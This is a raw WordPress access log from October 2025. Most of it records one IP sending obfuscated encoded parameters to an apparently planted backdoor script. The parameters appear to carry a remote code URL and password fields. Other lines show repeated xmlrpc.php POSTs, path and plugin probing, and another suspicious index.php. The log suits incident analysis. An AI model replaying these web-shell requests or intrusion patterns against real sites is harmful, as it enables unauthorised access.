142.4.205.1 - - [16/Oct/2025:14:56:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343539312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303939312q3132616332353635626435333634613839363338313565333737323633393234222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:56:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343631312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313031312q6237336539373230313836333764613734646261353034313434663366613166222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:57:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343633312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313033312q6431323139376164353032333830386230333435393166353663653234323163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:14:58:22 -0400] "GET /?_g=1354086 HTTP/1.0" 200 24388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:14:57:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343635312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313035312q3739663364616531613434386533393762363230376536646534656131366638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:57:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343637312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313037312q3861633566393062383637396133633763313230353131373261613430303336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
49.51.50.147 - - [16/Oct/2025:14:59:01 -0400] "GET /?path=/var/www/vhosts HTTP/1.0" 200 6681 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
142.4.205.1 - - [16/Oct/2025:14:58:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343639312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313039312q3338393764643962356362323035386232363761626463396238616234333961222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:58:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343731312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313131312q6664623264393932343638383131626235396263353730333065376462333666222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:14:59:34 -0400] "GET /?_g=906753 HTTP/1.0" 200 25076 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:14:58:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343733312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313133312q3166376239636262653934633137386130353134666465663538663337396134222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:59:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343735312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313135312q3435323464363264393664386630636537323035333862643265646461636437222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:59:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343737312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313137312q3763363832383063333262336635393336373861616463363861396638353238222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:15:00:35 -0400] "GET /?_g=315981 HTTP/1.0" 200 25586 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.47 - - [16/Oct/2025:15:00:36 -0400] "GET /market/2274800003.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:14:59:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343739312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313139312q6333336336613664626231366638616231323862303561336135653366316636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:00:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343831312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313231312q3261666463633630333862323838353830333035656334303134633365613238222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:00:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343833312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313233312q6461346266386666346631633336366437383338396132316433376631333663222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:00:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343835312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313235312q3237626132626436336433616564323034343061393138393338643732323637222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
94.136.190.3 - - [16/Oct/2025:15:01:51 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
94.136.190.3 - - [16/Oct/2025:15:01:53 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
94.136.190.3 - - [16/Oct/2025:15:01:54 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
94.136.190.3 - - [16/Oct/2025:15:01:56 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
94.136.190.3 - - [16/Oct/2025:15:01:57 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
66.249.65.195 - - [16/Oct/2025:15:01:57 -0400] "GET /?_g=266118 HTTP/1.0" 200 25206 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.136.190.3 - - [16/Oct/2025:15:01:58 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:15:01:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343837312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313237312q3966366532366639633539343161333965663536353764643264663263396531222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
89.107.138.12 - - [16/Oct/2025:15:02:29 -0400] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
142.4.205.1 - - [16/Oct/2025:15:01:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343839312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313239312q6334343832346532333765623037316565323637393332663538646133333531222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:01:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343931312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313331312q3162623862616335663732643463353266323035316633613334663430373230222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
91.84.114.150 - - [16/Oct/2025:15:03:02 -0400] "GET /2019/09/06/hello-world/ HTTP/1.0" 200 102732 "https://academiedumarketing.com/2019/09/06/hello-world/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
57.141.0.38 - - [16/Oct/2025:15:03:05 -0400] "GET /market/2274837097.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:15:02:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343933312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313333312q6432323762313561373332323431393961623434636536643162623865356333222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:02:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343935312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313335312q3634623065366130323136623337343938663038653733643332393732393835222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
89.110.64.239 - - [16/Oct/2025:15:03:45 -0400] "GET /2019/09/06/hello-world/ HTTP/1.0" 200 102732 "https://academiedumarketing.com/2019/09/06/hello-world/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
142.4.205.1 - - [16/Oct/2025:15:02:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343937312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313337312q6532313339663831376261313232333036373336333730303736393762643163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:03:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343939312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313339312q6435613238383133376236346336663466633962376563656130396163373230222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:03:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353031312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313431312q3930623437323832333437363366323263323132643932666433626331393065222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:03:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353033312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313433312q6231633436626633383762343735306161636436393934363763643063393030222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:15:04:57 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
5.35.37.26 - - [16/Oct/2025:15:05:05 -0400] "GET /2019/09/06/hello-world/ HTTP/1.0" 200 102732 "https://academiedumarketing.com/2019/09/06/hello-world/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
142.4.205.1 - - [16/Oct/2025:15:04:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353035312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313435312q3336313965613263353738346432306238383431386530653633393338336236222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:04:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353037312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313437312q3737313863616435653231623465626539616538636563303966663839393836222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:15:04:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353039312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313439312q3834346162313565363936626339353664613332636237393766653566663235222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:15:04:36 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1"
142.4.205.1 - - [16/Oct/2025:15:05:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634353131312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634313531312q3533393838326431306263303837313937343162333433666632316534623133222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:15:06:28 -0400] "GET /?_g=2195197 HTTP/1.0" 200 25785 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
